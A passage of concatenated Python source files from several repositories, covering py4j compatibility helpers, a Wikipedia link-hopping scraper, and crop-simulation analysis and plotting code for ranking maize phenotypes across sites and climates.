with open(os.path.join(str(tmpdir), 'monojetModel.pkl'), "wb") as fout:
pickle.dump(model, fout)
model.renderCombine(os.path.join(str(tmpdir), 'monojetModel'))
if __name__ == '__main__':
if not os.path.exists('tmp'):
os.mkdir('tmp')
test_rhalphabet('tmp')
test_monojet('tmp')
```
|
{
"source": "JennEYoon/python-ml",
"score": 3
}
|
#### File: practice/mymods/myfunc.py
```python
def cube(x):
print(x**3)
return x**3
```
|
{
"source": "jenngeorge/kafka-practice",
"score": 2
}
|
#### File: site-packages/py4j/compat.py
```python
from __future__ import unicode_literals, absolute_import
import inspect
import sys
from threading import Thread
version_info = sys.version_info
if version_info[:2] == (2, 6):
from py4j.backport import WeakSet # noqa
else:
from weakref import WeakSet # noqa
if version_info[0] < 3:
def items(d):
return d.items()
def iteritems(d):
return d.iteritems()
def next(x):
return x.next()
range = xrange # noqa
long = long # noqa
basestring = basestring # noqa
unicode = unicode # noqa
bytearray2 = bytearray
unichr = unichr # noqa
bytestr = str
tobytestr = str
def isbytestr(s):
return isinstance(s, str)
def ispython3bytestr(s):
return False
def isbytearray(s):
return isinstance(s, bytearray)
def bytetoint(b):
return ord(b)
def bytetostr(b):
return b
def strtobyte(b):
return b
import Queue
Empty = Queue.Empty
Queue = Queue.Queue
else:
def items(d):
return list(d.items())
def iteritems(d):
return d.items()
next = next
range = range
long = int
basestring = str
unicode = str
bytearray2 = bytes
unichr = chr
bytestr = bytes
def tobytestr(s):
return bytes(s, "ascii")
def isbytestr(s):
return isinstance(s, bytes)
def ispython3bytestr(s):
return isinstance(s, bytes)
def isbytearray(s):
return isinstance(s, bytearray)
def bytetoint(b):
return b
def bytetostr(b):
return str(b, encoding="ascii")
def strtobyte(s):
return bytes(s, encoding="ascii")
import queue
Queue = queue.Queue
Empty = queue.Empty
if hasattr(inspect, "getattr_static"):
def hasattr2(obj, attr):
return bool(inspect.getattr_static(obj, attr, False))
else:
hasattr2 = hasattr
class CompatThread(Thread):
"""Compatibility Thread class.
Allows Python 2 Thread class to accept daemon kwarg in init.
"""
def __init__(self, *args, **kwargs):
daemon = None
try:
daemon = kwargs.pop("daemon")
except KeyError:
pass
super(CompatThread, self).__init__(*args, **kwargs)
if daemon:
self.daemon = daemon
```
#### File: py4j/tests/py4j_callback_listener_example.py
```python
from py4j.java_gateway import JavaGateway, CallbackServerParameters
class PythonListener(object):
def __init__(self, gateway):
self.gateway = gateway
def notify(self, obj):
print("Notified by Java")
print(obj)
gateway.jvm.System.out.println("Hello from python!")
return "A Return Value"
class Java:
implements = ["py4j.examples.ExampleListener"]
if __name__ == "__main__":
gateway = JavaGateway(
callback_server_parameters=CallbackServerParameters())
listener = PythonListener(gateway)
gateway.entry_point.registerListener(listener)
gateway.entry_point.notifyAllListeners()
gateway.shutdown()
```
|
{
"source": "jenngrannen/WikiHop",
"score": 3
}
|
#### File: jenngrannen/WikiHop/Wikihop.py
```python
import requests
from bs4 import BeautifulSoup, SoupStrainer
def readLinks(url):
result = requests.get(url)
c = result.content
bodySection = SoupStrainer(id="mw-content-text")
soup = BeautifulSoup(c, "html.parser", parse_only=bodySection)
#bodySection = soup.select("body > div:nth-of-type(3) > div:nth-of-type(3) > div:nth-of-type(4) > div")
childrenList = []
for a in soup.find_all('a', href=True):
childrenList.append(a['href'])
return childrenList
def filterLinkList(list):
result = [l for l in list if (".png" and ".svg" and ".jpg" and ":") not in l ]
result = [l for l in result if "/wiki/" in l]
result = [l for l in result if "action=edit" not in l]
return result
def rewriteLinkList(list):
result = []
for l in list:
result.append("https://en.wikipedia.org" + l)
return result
class LinkClass:
linkName = ""
prevLink = None
def __init__(self, linkName, prevLink):
self.linkName = linkName
self.prevLink = prevLink
def convertListObjects(list, parent):
result = []
for l in list:
result.append(LinkClass(l, parent))
return result
def printObjList(list):
if list == None:
return
for l in list:
print(l.linkName)
# print(l.prevLink.linkName)
def check(list, endURL):
for l in list:
if l.linkName == endURL:
return True
return False
def getFinalLinks(start):
url = start.linkName
list = readLinks(url)
list = filterLinkList(list)
list = rewriteLinkList(list)
list = convertListObjects(list, start)
return list
def runIt(startURL, endURL, depth):
list = [LinkClass(startURL, None)]
count = 0
while not check(list, endURL) and count < depth:
tempList = []
for l in list:
tempList.extend(getFinalLinks(l))
#printObjList(tempList)
list = tempList
count = count + 1
if check(list, endURL):
goal = [l for l in list if l.linkName == endURL]
path = [goal[0].linkName]
p = goal[0]
while p.prevLink != None:
path.append(p.prevLink.linkName)
p = p.prevLink
return path[::-1]
return None
"""starturl = "https://en.wikipedia.org/wiki/Manu_propria"
endurl = "https://en.wikipedia.org/wiki/Roman_Republic"
print(runIt(starturl, endurl))
"""
```
|
{
"source": "jennhsiao/ideotype",
"score": 3
}
|
#### File: ideotype/ideotype/analysis.py
```python
import os
import collections
import pandas as pd
import numpy as np
from numpy import genfromtxt
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error, r2_score
from SALib.analyze import rbd_fast
from ideotype import DATA_PATH
from ideotype.init_params import params_sample
from ideotype.data_process import read_data, process_sims, agg_sims
def run_rbdfast(N_sample, run_name):
"""
Sensitivity analysis through RBD-FAST method.
Parameters
----------
N_sample : int
number of samples to generate.
run_name : str
run name for batch sims.
"""
problem, param_values = params_sample(run_name, N_sample)
# * param_values cannot directly be used for rbd_fast analysis here
# since values change with each sampling
# read in previously saved param.csv file as np.matrix
fpath_read = os.path.join(os.path.expanduser('~'),
'upscale', 'params',
f'param_{run_name}.csv'
)
X = genfromtxt(fpath_read, delimiter=',', skip_header=1)
# TODO: still need code that reads in Y here
Y = []
# Calculate sensitivity index
Si = rbd_fast.analyze(problem, X, Y, print_to_consol=False)
return Si
def run_pca(df, n):
"""
Run PCA on dataset.
Parameters
----------
df : np.matrix or pd.DataFrame
Data for PCA.
n : int
Number of components.
Returns
-------
Dataframe with all PC components.
"""
x = df
x = StandardScaler().fit_transform(x)
pca = PCA(n_components=n)
principalComponents = pca.fit_transform(x)
column_labels = [f'PC{comp+1}' for comp in np.arange(n)]
df_pca = pd.DataFrame(data=principalComponents,
columns=column_labels)
return pca, df_pca
def linear_mod(df, features, target, test_size=0.33):
"""
Linear model that operates from DF based on features & target.
Parameters
----------
df : pd.DataFrame
Dataframe to draw data for linear model.
features : list
List of features as strings used to construct linear model.
target : list
List of target as string.
test_size : float
Default as 0.33 - 33% of data set aside for testing.
"""
X = df[features]
y = df[target]
mod = LinearRegression(fit_intercept=True)
mod.fit(X, y)
y_pred = mod.predict(X)
coefs = mod.coef_
mse = mean_squared_error(y, y_pred)
r2 = r2_score(y, y_pred)
return coefs, mse, r2
def identify_top_phenos(run_name, n_pheno=5, w_yield=1, w_disp=1):
"""
Identify top performing phenotypes.
Parameters
----------
n_pheno : int
Number of top phenotypes to identify.
w_yield : int
Weight on importance of yield.
Value between 0 - 1.
w_disp : int
Weight on importance of yield dispersion.
Value between 0 - 1.
Returns
-------
df_pheno : pd.DataFrame
Dataframe with phenotype performance and site info for mapping.
mx_pheno : np.array
Matrix with site, pheno, and phenotype performance info for heatmap.
"""
df_sims, df_sites, df_wea, df_params, df_all, df_matured = read_data(
os.path.join(DATA_PATH, 'files', f'filepaths_{run_name}.yml'))
sites = sorted(list(set(df_all.site)))
phenos = list(set(df_all.cvar))
list_top_phenos = [[] for item in np.arange(n_pheno)]
# Identify high performing combinations
for site in sites:
# Filter out data for specific site
df_sub = df_all.query(f'site=="{site}"')
# Calculate mean yied and yield dispersion acorss years
# for specified site
yield_mean = df_sub.groupby('cvar').mean().dm_ear
yield_var = df_sub.groupby('cvar').var().dm_ear
yield_disp = yield_var/yield_mean
# Standardize yield_mean & yield_disp into between 0 & 1
yield_mean_norm = (
yield_mean-yield_mean.min())/(yield_mean.max()-yield_mean.min())
yield_disp_norm = (
yield_disp-yield_disp.min())/(yield_disp.max()-yield_disp.min())
# Identify max yield and min dispersion
max_yield = yield_mean_norm.max()
min_disp = yield_disp_norm.min()
# Calculate distance to theoretical optimal
dist = [np.sqrt(
w_yield*(ymean - max_yield)**2 + w_disp*(ydisp - min_disp)**2)
for ymean, ydisp in zip(yield_mean_norm, yield_disp_norm)]
df_dist = pd.DataFrame(dist, columns=['dist'])
top_phenos = list(df_dist.nsmallest(n_pheno, 'dist').index)
for item in np.arange(len(list_top_phenos)):
top_pheno = top_phenos[item]
list_top_phenos[item].append(top_pheno)
# Set up dataframe with top performing pheno info
df_pheno = pd.DataFrame(list_top_phenos).transpose()
df_pheno.columns = [f'pheno{n+1}' for n in np.arange(n_pheno)]
df_pheno['sites'] = sites
df_pheno = pd.merge(df_pheno, df_sites, left_on='sites', right_on='site')
df_sites_sorted = pd.DataFrame(sites)
df_sites_sorted.columns = ['site']
df_sites_sorted['site_num'] = np.arange(len(sites))
df_pheno = pd.merge(
df_pheno, df_sites_sorted, left_on='sites', right_on='site')
# Initiate empty matrix
mx_pheno = np.empty(shape=[len(phenos), len(sites)])
mx_pheno[:] = np.nan
# Fill in matrix data
for item in np.arange(n_pheno):
mx_pheno[df_pheno[f'pheno{item+1}'], df_pheno['site_num']] = item + 1
return(df_pheno, mx_pheno)
def top_pheno_prevalence(run_name, n_pheno, intervals):
"""
Identify the prevalence of top performing phenotypes.
Parameters
----------
run_name : str
Simulation run name.
n_pheno : int
Number of top phenotypes to identify.
intervals : int
Number of intervals to create for yield and dispersion weights.
Returns
-------
df_pheno_prevalence : pd.DataFrame
"""
pheno_prevalences = []
list_intervals = [round(item, 2) for item in np.arange(
0, 1.000001, 1/intervals)]
w_yields = list_intervals.copy()
w_disps = list_intervals.copy()
w_disps.reverse()
for item in np.arange(intervals):
df_pheno, mx = identify_top_phenos(
run_name=run_name,
n_pheno=n_pheno,
w_yield=w_yields[item],
w_disp=w_disps[item])
# convert matrix with site and ranking info into dataframe
df = pd.DataFrame(mx)
# count the number of times each phenotype
# made it into top rankings (n_pheno) across all locations
pheno_prevalence = list(df.count(axis=1))
pheno_prevalences.append(pheno_prevalence)
df_pheno_prevalence = pd.DataFrame(pheno_prevalences).transpose()
return(df_pheno_prevalence)
def prevalent_top_pheno(run_name, n_pheno, w_yield, w_disp, site_threshold):
"""
Identify top performing and prevalent phenotypes.
Parameters
----------
run_name : str
site_threshold : int
Threshold for number of sites phenotype should at least have ranked
as top performer.
Returns
-------
list_top_pheno : list
List of top performing prevalent phenotypes.
"""
df_pheno, mx_pheno = identify_top_phenos(
run_name, n_pheno, w_yield, w_disp)
df_prevalence = pd.DataFrame(mx_pheno).notna().astype(int).sum(axis=1)
df_prevalence_sorted = df_prevalence.sort_values()
list_top_phenos = df_prevalence_sorted[
df_prevalence_sorted > site_threshold].index.tolist()
list_top_phenos.reverse()
return(list_top_phenos)
def rank_by_yield(df):
"""
Rank phenotypes by yield only.
Parameters
----------
df : pd.DataFrame
MAIZSIM yield output dataframe.
df_sims or df_mature
"""
# Prep data
groups = ['cvar', 'site']
how = 'mean'
sim = 'dm_ear'
mx_mean = agg_sims(df, groups, how, sim)
df_yield_means = pd.DataFrame(mx_mean)
# Sort data based on mean yield value
df_yield_means['mean'] = df_yield_means.mean(axis=1)
# Rank phenos by yield
phenos_ranked_by_yield = list(df_yield_means.sort_values(by=['mean'],
axis=0, ascending=False).index)
return phenos_ranked_by_yield
def rank_all_phenos(run_name, n_pheno, w_yield, w_disp):
"""
Rank performance for all phenotypes across all locations.
Parameters
----------
run_name : str
n_pheno : int
w_yield : float
w_disp : float
Returns
-------
phenos_ranked : list
"""
# Identify ranking for all phenotypes
df_pheno, mx = identify_top_phenos(
run_name, n_pheno=n_pheno, w_yield=w_yield, w_disp=w_disp)
# Rank general performance for all phenotypes across all sites
performance = []
for site in np.arange(df_pheno.shape[0]):
# Select phenotypes ranked by performance from df_pheno
phenos = df_pheno.iloc[site, :n_pheno].tolist()
# Assign each phenotype ranked value
# -- lower values mean better performance)
pheno_ranks = np.arange(n_pheno)
# Compile phenotype and ranking info into dict
dict_rank = dict(zip(phenos, pheno_ranks))
# Sort dict to order by phenotype
dict_sorted = collections.OrderedDict(sorted(dict_rank.items()))
# Append ranking into list of performance
performance.append(list(dict_sorted.values()))
# Calculate performance
# -- phenotypes with lowest sum have best performance overall
df_rankings = pd.DataFrame(performance).transpose()
df_performance = df_rankings.sum(axis=1)
phenos_ranked = list(df_performance.sort_values(ascending=True).index)
return(df_rankings, phenos_ranked)
def rank_top_phenos(run_name, n_pheno, w_yield, w_disp):
"""
Rank phenotypes that at least rank top n at sim sites.
n_pheno : int
Ranking that phenotype at least should achieve.
"""
df_pheno, mx = identify_top_phenos(run_name,
n_pheno=n_pheno,
w_yield=w_yield,
w_disp=w_disp)
top_phenos = []
for item in np.arange(n_pheno):
# Identify phenotypes in each ranking for each site
top_pheno = list(set(df_pheno.iloc[:, item]))
top_phenos.extend(top_pheno)
# Compile all phenotypes
list_top_phenos = list(set(top_phenos))
# Determine prevalence of phenotype occurrence
rank_sums = []
for item in list_top_phenos:
rank_list = list(mx[item])
rank_list_reversed = [(n_pheno + 1) - rank for rank in rank_list]
rank_sum = np.nansum(rank_list_reversed)
rank_sums.append(rank_sum)
df_ranksum = pd.DataFrame({'pheno': list_top_phenos,
'rank_sum': rank_sums})
top_pheno_ranks = list(df_ranksum.sort_values(
'rank_sum', ascending=False)['pheno'])
return(top_pheno_ranks)
def identify_improved_phenos(n_pheno, w_yield, w_disp,
future_run, rank_cutoff=20):
"""
Identify improved phenotypes.
Parameters
----------
n_pheno : int
w_yield : int
w_disp : int
future_run : str
run_name of future sim ('f2050', 'f2100')
rank_cutoff : int
Cut-off rank to be considered as 'top-ranking'.
Returns
-------
phenos_improved : list
All phenotypes that had positive rank change.
phenos_targeted : list
All phenotypes that had positive rank change and
also had final rank within rank_cutoff.
phenos_new : list
All phenotypes that ranked within rank_cutoff,
but was not originally one of the top ranked phenotypes.
"""
# Rank top phenos
top_phenos_present = rank_top_phenos('present', n_pheno, w_yield, w_disp)
top_phenos_future = rank_top_phenos(future_run, n_pheno, w_yield, w_disp)
# Calculate rank difference & identify new ranks
rank_diffs = []
new_ranks = []
for item, pheno in enumerate(top_phenos_present):
try:
new_rank = top_phenos_future.index(pheno)
new_ranks.append(new_rank)
rank_diffs.append(item-new_rank)
except (ValueError):
new_ranks.append(np.nan)
rank_diffs.append(np.nan)
# Compile into dataframe
df_ranks = pd.DataFrame({'top_phenos_present': top_phenos_present,
'new_rank': new_ranks,
'rank_diff': rank_diffs})
df_ranks_sorted = df_ranks.sort_values('rank_diff', ascending=False)
# Improved & targeted phenos
phenos_improved = list(df_ranks_sorted.query(
'rank_diff>0')['top_phenos_present'])
phenos_targeted = list(df_ranks_sorted.query('rank_diff>0').query(
f'new_rank<{rank_cutoff}')['top_phenos_present'])
# New phenos
pheno_select = [
count for count, pheno in enumerate(rank_diffs) if pheno is np.nan]
phenos_new = []
for item in pheno_select:
if item < rank_cutoff:
try:
new_pheno = top_phenos_future[item]
if new_pheno not in top_phenos_present:
phenos_new.append(new_pheno)
except(ValueError):
print('future top ranks less than present day')
return(phenos_improved, phenos_targeted, phenos_new)
def phenostage_climate(df_all, df_gseason_climate,
df_waterdeficit, phenostage_num):
"""
Process climate data to get in-season summaries.
Parameters
----------
df_all : pd.DataFrame
df_gseason_climate : pd.DataFrame
df_waterdeficit : pd.DataFrame
phenostage_num : int
0 - Emerged
1 - Tasselinit
2 - Tasseled & Silked
3 - Grainfill
"""
phenostages = [['"Emerged"'], ['"Tasselinit"'],
['"Tasseled"', '"Silked"'], ['"grainFill"']]
phenos = np.arange(100)
sites = sites = sorted(list(set(df_all.site)))
phenostage = phenostages[phenostage_num]
# temp
df = df_gseason_climate
sim = 'temp_air'
agg_method = 'mean'
mx_temp = process_sims(df, sites, phenos, phenostage, sim, agg_method)
df_temp = pd.DataFrame(mx_temp)
# vpd
df = df_gseason_climate
sim = 'vpd'
agg_method = 'mean'
mx_vpd = process_sims(df, sites, phenos, phenostage, sim, agg_method)
df_vpd = pd.DataFrame(mx_vpd)
# water deficit
df = df_waterdeficit
sim = 'water_deficit_mean'
agg_method = 'mean'
phenostage = phenostages[phenostage_num]
mx_wd = process_sims(df, sites, phenos, phenostage, sim, agg_method)
df_wd = pd.DataFrame(mx_wd)
return(df_temp, df_vpd, df_wd)
def calc_target_pheno_perct(df_params, phenos_ranked,
target_param, comparison):
"""
Calculate percent of targeted phenotypes with desired param trait.
df_params : pd.DataFrame
phenos_ranked : list
target_param : str
comparison : str
'greater' - select phenos with param value
greater than average param value.
'less_than' - select phenos with param values
less than average param value.
"""
# Calculate target parameter mean value
target_param_mean = df_params[target_param][:100].mean()
# Query phenotypes with parameter values greater than parameter mean
if comparison == 'greater':
phenos_targetparam = list(df_params[:100].query(
f'{target_param} > {target_param_mean}').cvar)
if comparison == 'less_than':
phenos_targetparam = list(df_params[:100].query(
f'{target_param} < {target_param_mean}').cvar)
# Calculate percent
phenos = []
for pheno in phenos_targetparam:
if pheno in phenos_ranked[50:]:
phenos.append(pheno)
perct = len(phenos)/len(phenos_targetparam)
return(phenos_targetparam, perct)
```
#### File: ideotype/ideotype/figures.py
```python
import os
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from datetime import datetime
from palettable.colorbrewer.diverging import PuOr_7
from palettable.cartocolors.sequential import PurpOr_6
from palettable.colorbrewer.sequential import YlGn_9
from palettable.wesanderson import Mendl_4
from ideotype.data_process import (read_data,
process_sims,
fetch_norm_mean_disp,
fetch_mean_disp_diff)
from ideotype.analysis import rank_top_phenos
from ideotype.init_params import params_sample
from ideotype.utils import fold
from ideotype import DATA_PATH
def plot_sims_heatmap(df, sim, agg_method, phenos_ranked,
cmap, vmins=None, vmaxs=None,
yfont_size=8, fig_w=20, fig_h=18,
save=False):
"""
Plot out simulation heatmaps.
Parameters
----------
df : pd.DataFrame
Queried maizsim output dataframe.
sim : str
MAIZSIM output you wish to plot.
agg_method : str
"""
# Read in sim data
df_sims, df_sites, df_wea, df_params, df_all, df_matured = read_data(
'/home/disk/eos8/ach315/ideotype/ideotype/data/files/'
'filepaths_present.yml')
# Set up sites and phenotypes
sites_unsorted = list(set(df_sims.site))
sites = sites_unsorted.copy()
sites.sort()
phenos = list(set(df_sims.cvar))
# Set up phenostages
phenostages = [['"Emerged"'],
['"Tasselinit"'],
['"Tasseled"', '"Silked"'],
['"grainFill"']]
titles = ['Emerged',
'Tassel initiation',
'Tasseled & Silked',
'Grain Filling']
# Visualization
fig = plt.figure(figsize=(fig_w, fig_h))
for index in np.arange(4):
phenostage = phenostages[index]
mx_sims = process_sims(df, sites, phenos, phenostage, sim, agg_method)
df_sims = pd.DataFrame(mx_sims).reindex(phenos_ranked)
ax = fig.add_subplot(2, 2, index+1)
if (vmins is None) & (vmaxs is None):
sns.heatmap(df_sims, cmap=cmap,
cbar_kws={'shrink': 0.5})
else:
sns.heatmap(df_sims, cmap=cmap,
vmin=vmins[index], vmax=vmaxs[index],
cbar_kws={'shrink': 0.5})
ax.set_title(f'{titles[index]}', fontweight='light', size=14)
ax.set_xlabel('sites', fontweight='light', size=12)
ax.set_ylabel('phenotypes', fontweight='light', size=12)
plt.xticks(fontweight='light', fontsize=10)
ax.set_yticks(np.arange(0.5, len(phenos_ranked)+0.5))
ax.set_yticklabels(phenos_ranked, fontweight='light',
size=yfont_size, rotation=0)
plt.suptitle(f'{sim}', fontweight='light', x=0.5, y=0.93, size=20)
fig.subplots_adjust(wspace=0.08)
fig.subplots_adjust(hspace=0.15)
if save is True:
plt.savefig(
f'/home/disk/eos8/ach315/upscale/figs/heatmap_sims_{sim}.png',
format='png', dpi=800)
def plot_pheno_summary(df, pheno_stage,
target, phenos_ranked,
color, alpha,
target_phenos=None, target_color=None,
target_alpha=None, save=False):
"""
Plot out phenotype summaries fo sim output.
Parameters
----------
df : pd.DataFrame
phenos_ranked : list
pheno_stage : str
target : str
target_phenos : list
"""
# Parameters
df_grouped = df.groupby(['cvar', 'pheno']).mean().reset_index()
sim_values = []
for pheno in phenos_ranked:
df_bool = df_grouped[
(df_grouped.pheno == pheno_stage) &
(df_grouped.cvar == pheno)][target].shape[0]
if df_bool == 0:
sim_values.append(np.nan)
else:
sim_value = df_grouped[
(df_grouped.pheno == pheno_stage) &
(df_grouped.cvar == pheno)][target].values.item()
sim_values.append(sim_value)
# Turn top pheno list into string for plotting purposes
phenos_str = [str(pheno) for pheno in phenos_ranked]
# Visualization
fig = plt.figure(figsize=(15, 4))
ax = fig.add_subplot(1, 1, 1)
ax.bar(phenos_str, sim_values, width=0.5, color=color, alpha=alpha)
ax.set_xlim(-2, 101)
ax.set_ylabel(target, fontweight='light', size=12)
ax.set_xlabel('phenotype', fontweight='light', size=12)
ax.set_title(f'{pheno_stage}', fontweight='light')
plt.xticks(fontweight='light', fontsize=8, rotation=90)
plt.yticks(fontweight='light', fontsize=10, rotation=0)
if target_phenos is not None:
for target_pheno in target_phenos:
ax.bar(str(target_pheno),
sim_values[phenos_ranked.index(target_pheno)],
width=0.5, color=target_color, alpha=target_alpha)
if save is True:
phenostage_write = pheno_stage.strip('"')
if target_phenos is None:
plt.savefig(
f'/home/disk/eos8/ach315/upscale/figs/'
f'bars_pheno_{target}_{phenostage_write}.png',
format='png', dpi=800)
else:
plt.savefig(
f'/home/disk/eos8/ach315/upscale/figs/'
f'bars_pheno_{target}_{phenostage_write}_'
f'targetpheno.png',
format='png', dpi=800)
def plot_site_summary(df, pheno_stage, target, color, alpha, save=False):
"""
Plot out site summaries fo sim output.
Parameters
----------
df : pd.DataFrame
pheno_stage : str
"""
# Read in sims data
df_sims, df_sites, df_wea, df_params, df_all, df_matured = read_data(
'/home/disk/eos8/ach315/ideotype/ideotype/data/files/'
'filepaths_present.yml')
# Parameters
df_grouped = df.groupby(['site', 'pheno']).mean().reset_index()
sites = [int(site) for site in df_sites.site]
sim_values = []
for site in sites:
df_bool = df_grouped[
(df_grouped.pheno == pheno_stage) &
(df_grouped.site == site)][target].shape[0]
if df_bool == 0:
sim_values.append(np.nan)
else:
sim_value = df_grouped[
(df_grouped.pheno == pheno_stage) &
(df_grouped.site == site)][target].values.item()
sim_values.append(sim_value)
# Visualization
fig = plt.figure(figsize=(10, 2))
ax = fig.add_subplot(1, 1, 1)
ax.set_xlim(-2, 61)
ax.bar(df_sites.site, sim_values, width=0.5, color=color, alpha=alpha)
ax.set_ylabel(target, fontweight='light', size=12)
ax.set_xlabel('sites', fontweight='light', size=12)
plt.xticks(fontweight='light', fontsize=8, rotation=90)
plt.yticks(fontweight='light', fontsize=10, rotation=0)
if save is True:
plt.savefig(
f'/home/disk/eos8/ach315/upscale/figs/bars_site_{target}.png',
format='png', dpi=800)
def plot_params_heatmap(df_params, top_phenos,
n_phenos_toplot=20, fig_w=9, fig_h=6,
save=None, save_text=None):
"""
Plot params heatmap.
Parameters
----------
df_params : pd.DataFrame
top_phenos: list
List of phenos to plot.
n_phenos_toplot : int
-1 - plot all top phenos
"""
# Determined parameters perturbed and perturb range
problem, param_values = params_sample('present', 10)
param_range = dict(zip(problem['names'], problem['bounds']))
params = problem['names']
df_params_fold = pd.DataFrame(columns=params)
# Normalize parameter values
if n_phenos_toplot == -1:
n_phenos_toplot = len(top_phenos)
if n_phenos_toplot > len(top_phenos):
n_phenos_toplot = len(top_phenos)
df_highperformance = df_params.iloc[top_phenos[:n_phenos_toplot], :-1]
for param in params:
df_params_fold[param] = fold(df_highperformance[param],
param_range[param][0],
param_range[param][1])
# Visualize
fig, ax = plt.subplots(figsize=(fig_w, fig_h))
ax.imshow(df_params_fold.transpose(), cmap=PuOr_7.mpl_colormap)
ax.set_xticks(np.arange(df_highperformance.shape[0]))
ax.set_yticks(np.arange(df_highperformance.shape[1]))
ax.set_xticklabels(list(df_highperformance.index),
size=10, fontweight='light')
ax.set_yticklabels(list(df_highperformance.columns),
size=10, fontweight='light')
for top_pheno in np.arange(n_phenos_toplot):
for param in range(len(params)):
ax.text(top_pheno, param,
df_params.transpose().loc[params[param],
top_phenos[top_pheno]],
ha='center', color='grey', size=7)
fig.subplots_adjust(left=0.15)
if save is True:
plt.savefig(f'/home/disk/eos8/ach315/upscale/figs/'
f'heatmap_params_{save_text}.png',
format='png', dpi=800)
def plot_rankchange(n_pheno, w_yield, w_disp, future_run,
fig_w=12, fig_h=4, save=None):
"""
Plot rank change.
Parameters
----------
n_pheno : int
w_yield : int
w_disp : int
future_run : str
n_phenos_toplot : int
save : bool
"""
# Prep ranks
top_phenos_present = rank_top_phenos('present', n_pheno, w_yield, w_disp)
top_phenos_future = rank_top_phenos(future_run, n_pheno, w_yield, w_disp)
rank_diffs = []
new_ranks = []
for item, pheno in enumerate(top_phenos_present):
try:
new_rank = top_phenos_future.index(pheno)
new_ranks.append(new_rank)
rank_diffs.append(item-new_rank)
except (ValueError):
new_ranks.append(new_rank)
rank_diffs.append(np.nan)
# Visualization
fig = plt.figure(figsize=(fig_w, fig_h))
ax = fig.add_subplot(1, 1, 1)
phenos = top_phenos_present[:]
y1s = []
y2s = []
for item, pheno in enumerate(phenos):
y1s.append(n_pheno-item)
y2s.append((n_pheno-item) + rank_diffs[item])
if rank_diffs[item] < 0:
plt.arrow(item, n_pheno-item, 0, rank_diffs[item],
head_width=0.8,
length_includes_head=True,
head_starts_at_zero=True,
color='tab:orange', alpha=0.8)
elif rank_diffs[item] > 0:
plt.arrow(item, n_pheno-item, 0, rank_diffs[item],
head_width=0.8,
length_includes_head=True,
color='tab:purple', alpha=0.8)
elif rank_diffs[item] == 0:
plt.scatter(item, n_pheno-item, c='grey', alpha=0.8, marker='_')
else:
try:
new_pheno = top_phenos_future[item]
if new_pheno in top_phenos_present:
plt.scatter(item, n_pheno-item, c='grey',
alpha=0.8, marker='x')
else:
plt.scatter(item, n_pheno-item, c='grey',
s=200, alpha=0.2, marker='o')
plt.text(item-0.5, n_pheno-item-1,
new_pheno, size=10, fontweight='light')
except IndexError:
print('future top ranks less than present day')
# x-axis
ax.set_xlim(-1, len(top_phenos_present))
ax.xaxis.tick_top()
ax.set_xticks(np.arange(len(top_phenos_present)))
ax.set_xticklabels(top_phenos_present, fontweight='light',
fontsize=10, rotation=90)
# y-axis
min_y = min(min(y1s), min(y2s))
min_y_rounded = round(min_y/5)*5
plt.ylabel('ranking', fontweight='light', size=14)
ax.set_ylim(min_y_rounded-1, n_pheno+1)
ax.set_yticks(np.arange(min_y_rounded, n_pheno+1, 5))
ax.set_yticklabels(np.arange(0, abs(min_y_rounded)+n_pheno+1, 5)[::-1],
fontweight='light')
# patch
rect = plt.Rectangle((-1, 0), len(top_phenos_present)+1, n_pheno+1,
facecolor='grey', alpha=0.1)
ax.add_patch(rect)
# save
if save is True:
plt.savefig(f'/home/disk/eos8/ach315/upscale/figs/'
f'rankchange_{future_run}_top{n_pheno}'
f'_y{w_yield}_d{w_disp}.png',
format='png', dpi=800)
def plot_cspace_rank(phenos_targeted, mx_present, mx_future,
df_climate_x_present, df_climate_y_present,
df_climate_x_future, df_climate_y_future,
climate_x, climate_y):
"""
Plot out rank in cspace.
Parameters
----------
phenos_targeted : list
climate_x : str
climate_y : str
"""
fig = plt.figure(figsize=(16, 10))
for item, pheno in enumerate(phenos_targeted):
ax = fig.add_subplot(4, 5, item+1)
# current climate
ax.scatter(df_climate_x_present.iloc[pheno],
df_climate_y_present.iloc[pheno],
marker='o', facecolors='none', edgecolors='grey',
alpha=0.6, s=60)
ax.scatter(df_climate_x_present.iloc[pheno],
df_climate_y_present.iloc[pheno],
c=mx_present[pheno],
cmap=PurpOr_6.mpl_colormap.reversed(),
vmin=0, vmax=20, alpha=0.4, s=60)
# future climate
ax.scatter(df_climate_x_future.iloc[pheno],
df_climate_y_future.iloc[pheno],
marker='^', facecolor='none', edgecolors='grey',
alpha=0.6, s=60)
ax.scatter(df_climate_x_future.iloc[pheno],
df_climate_y_future.iloc[pheno],
c=mx_future[pheno], cmap=PurpOr_6.mpl_colormap.reversed(),
marker='^', vmin=0, vmax=20, alpha=0.4, s=60)
ax.set_xlim(8, 35)
ax.set_ylim(0, 4.1)
ax.set_xlabel(climate_x, fontweight='light')
ax.set_ylabel(climate_y, fontweight='light')
ax.annotate(pheno, (12, 3.2), fontweight='light', size=10)
def plot_cspace_yield(phenos_targeted, df_grouped_present, df_grouped_future,
df_climate_x_present, df_climate_y_present,
df_climate_x_future, df_climate_y_future,
climate_x, climate_y, vmin=80, vmax=250):
"""
Plot out yield in cspace.
Parameters
----------
phenos_targeted : list
climate_x : str
climate_y : str
"""
fig = plt.figure(figsize=(16, 10))
for item, pheno in enumerate(phenos_targeted):
df_present = df_grouped_present[df_grouped_present.cvar == pheno]
df_future = df_grouped_future[df_grouped_future.cvar == pheno]
ax = fig.add_subplot(4, 5, item+1)
# current climate
ax.scatter(df_climate_x_present.iloc[pheno],
df_climate_y_present.iloc[pheno],
marker='o', facecolors='none', edgecolors='grey',
alpha=0.6, s=60)
ax.scatter(df_climate_x_present.iloc[pheno],
df_climate_y_present.iloc[pheno],
c=df_present.dm_ear,
cmap=YlGn_9.mpl_colormap,
vmin=vmin, vmax=vmax, alpha=0.6, s=60)
# future climate
ax.scatter(df_climate_x_future.iloc[pheno],
df_climate_y_future.iloc[pheno],
marker='^', facecolor='none', edgecolors='grey',
alpha=0.6, s=60)
ax.scatter(df_climate_x_future.iloc[pheno],
df_climate_y_future.iloc[pheno],
c=df_future.dm_ear,
cmap=YlGn_9.mpl_colormap,
marker='^',
vmin=vmin, vmax=vmax, alpha=0.6, s=60)
ax.set_xlim(8, 35)
ax.set_ylim(0, 4.1)
ax.set_xlabel(climate_x, fontweight='light')
ax.set_ylabel(climate_y, fontweight='light')
